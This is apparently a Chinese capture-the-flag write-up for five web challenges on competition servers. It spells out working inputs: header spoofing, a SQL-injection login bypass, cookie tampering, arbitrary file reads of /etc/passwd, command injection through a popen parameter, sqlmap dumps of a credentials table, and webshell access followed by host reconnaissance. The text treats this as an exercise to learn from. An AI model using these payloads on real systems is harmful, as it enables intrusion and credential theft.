web

web100:flag之路

Step 1:http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!
 Step 2:FireFox插件将Request Header中X-Forwarded-For字段设为127.0.0.1
 Here is your flag: ACTF{I_love_H4ck_and_I_love_F4ck}

web200:讨厌的管理员

http://218.2.197.236:2005/web200/index.php表单登录页面,题目说flag在管理员手上
 POST数据:name=admin%27+or+1%3D1+or+%27&pass=admin
 提示:flag is in ae6032eeeb5cedc1555940983435335b.php,访问页面说,key not here
 response header中realkeyisin: beda47ac34562108ee149767c61cb0ec.php,访问这个页面说admin才能看到
 感觉是要提交什么数据标识自己是admin,请求时带上Cookie: admin=1
 flag:ACTF{I_donot_need_sex_life_fxxks_me_everyday}

web300:喵喵喵喵

http://218.2.197.236:2001/login.php
 I love you.And you?Then hack me please.
 http://218.2.197.236:2001/主页上,
 About This Blog
 This doubi web blog layout is provided by ./bc
http://218.2.197.236:2001/bc/
 http://218.2.197.236:2001/download/doWnlOad.php?uuu=./doWnlOad.php 任意文件读取 

$url=$_GET['uuu'];
$url=str_replace("..","",$url);
$file = fopen("$url", "r") or exit("Unable to open file!");
//Output a line of the file until the end is reached
while(!feof($file)) {
echo fgets($file)."
";
}
fclose($file);
?>

http://218.2.197.236:2001/download/doWnlOad.php?uuu=/etc/passwd
 HINT:x:500:500::/usr/share/ngInx/html:/bin/bash
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/html
 想起来那个很挑逗的,让你hack她的login.php页面,读一下她 

header("Content-type:text/html; charset=GB2312");
$uid=$_GET["gongwan"];
if($fd=popen("/heiheihei/bin/online_user -f ".$uid, "r"))#看这里嘿嘿嘿,存在命令执行漏洞
{
$content=fread($fd, 1024);
fclose($fd);
}

$array=explode("\t",$content);

if($array[3]==0)
{
exit("I love you.And you?Then hack me please.");
}

if($_SERVER["REMOTE_ADDR"] != $array[3])
{
exit();
}
?>

http://218.2.197.236:2001/login.php?gongwan=22222%20||%20ls%20%3E./tesst.txt
 http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/html/tesst.txt
 1
 HiCode.cn.url
 appleu0.txt
 baka.mp3
 bc
 c0nfIg.php
 contentslider.css
 contentslider.js
 dbiNf0.php
 download
 images
 index.html
 index.php
 login.php
 sb.txt
 templatemo_style.css
 tesst.txt
 http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/html/dbiNf0.php 

$salt = "abchefghjkmnpqrstuvwxyz0123456789"; //Salt hash to help secure your passwords, it's recommended that you change this to something unique and long
$captcha_salt = "abchefghjkmnpqrstuvwxyz123456789"; //create a new CAPTCHA Salt for this session

$dbhost = "localhost";
$dbname = "FLAG"; // mysql database name
$dbuser = "FLAG"; // mysql database username
$dbpass = "ACTF{300deeaSyFlAGmemeDa}"; // mysql database password
$pre = "onecms_"; // prefix for onecms tables
?>

web400:贡碗酱

于是继续翻找
 http://218.2.197.236:2001/login.php?gongwan=22222 || ls -la /usr/share/ngInx>./tesst.txt
 total 16
 drwxr-xr-x. 4 root root 4096 Apr 4 21:30 .
 drwxr-xr-x. 125 root root 4096 Apr 4 21:03 ..
 dr-xr-xr-x 2 root root 4096 Apr 4 21:24 NOTE
 drwxr-xrwx. 5 root root 4096 Apr 11 20:10 html
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/NOTE/note
 今天加上了心仪的妹子的qq,实在太开心了!
 2018.3.22

aay给了我旁边机器的一个低权限用户。我实在不擅长linux啊,但是他的一个页面好像有漏洞,好像是hejUbiAn.php。
 2018.3.23

我用这个漏洞给数据库里写了些数据,正好把我传上去的一句话木马地址藏进去,嘿嘿嘿。
 2018.3.25

在那个数据库里记一下那个一句话木马的密码吧,免得忘了,不过直接存密码不太安全呀~那我只存那个妹子的qq,密码是这妹子名字的小写拼音,这样我这个日记泄露了也不会有人能登陆,嘿嘿嘿。
 2018.3.26

旁边机器的管理员aay总是不给我root权限,也从不请我们吃饭,早看他不顺眼了。我给他服务器做了个alias关联来欺骗他的root密码,大概不用几天就能成功了吧。
 2018.4.1

http://218.2.197.236:2003/hejUbiAn.php
 页面上的Z3c=解密结果gw,密码错误时,提示你不是gongwan
 想到可以base64编码注入点
 ./sqlmap.py -u "http://218.2.197.236:2003/hejUbiAn.php" --data "password=gongwan" --tamper "base64encode.py" --dbs
 ./sqlmap.py -u "http://218.2.197.236:2003/hejUbiAn.php" --data "password=gongwan" --tamper "base64encode.py" -D "raw_admin" --dump
 Database: raw_admin
 Table: admin
+--------------------+-----------------+
 | login | password |
 +--------------------+-----------------+
 | gw | gongwandaiskkkk |
 | Fuckingluyuhao.php | 906239288 |
 | luyuhaoxiaodaibi | luyuhaodadaibi |
 +--------------------+-----------------+
 qq号,百度账号,似乎都没有名字。
 qq微博搜搜
 http://t.qq.com/wangbiyun3709
 真的是你家暗恋的妹纸?
 客户端连到一句话木马之后,在/var/tmp/TheFlagIsHere.txt找到flag
 ro0T:F1aG:{YaNg_zi_j1angDa1skdaiyouKukuku} Is Ok

这flag这么明显不知道是不是题被改过了,现在平台也没开放了

web500:丧心病狂的黑客

web300:218.2.197.236:2001
 web400:218.2.197.236:2003 

[/var/www/html/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:1F:58:C6  
          inet addr:172.17.3.2  Bcast:172.17.3.3  Mask:255.255.255.252
          inet6 addr: fe80::20c:29ff:fe1f:58c6/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1643665 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1655915 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:230218730 (219.5 MiB)  TX bytes:950011384 (906.0 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:348 errors:0 dropped:0 overruns:0 frame:0
          TX packets:348 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:35642 (34.8 KiB)  TX bytes:35642 (34.8 KiB)
          
[/var/www/html/]$ uname -a
Linux gamebox 2.6.32-431.11.2.el6.centos.plus.x86_64 #1 SMP Tue Mar 25 21:36:54 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

[/var/log/]$ arp -a
zhutou-centos-3-gw (172.17.3.1) at 00:0c:29:03:c2:e2 [ether] on eth0

(未完待续)